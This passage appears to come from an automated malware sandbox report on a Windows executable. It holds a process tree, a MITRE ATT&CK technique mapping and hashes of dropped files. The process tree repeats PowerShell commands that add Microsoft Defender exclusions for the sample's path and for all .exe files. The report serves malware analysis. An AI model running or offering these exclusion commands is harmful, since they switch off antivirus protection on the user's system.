  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    PID:1344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5016
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    PID:3572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:8
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:3816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    PID:4000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:4872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:1472

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kpkavdoe.j0a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1764-3-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download
memory/1764-10-0x0000029B24400000-0x0000029B24422000-memory.dmp

Filesize
136KB

Download
memory/1764-14-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download
memory/1764-4-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download
memory/1764-25-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download
memory/2260-0-0x00000129510C0000-0x00000129510F0000-memory.dmp

Filesize
192KB

Download
memory/2260-2-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download
memory/2260-1-0x00007FF9C9373000-0x00007FF9C9375000-memory.dmp

Filesize
8KB

Download
memory/2260-89-0x00007FF9C9373000-0x00007FF9C9375000-memory.dmp

Filesize
8KB

Download
memory/2260-110-0x00007FF9C9370000-0x00007FF9C9E32000-memory.dmp

Filesize
10.8MB

Download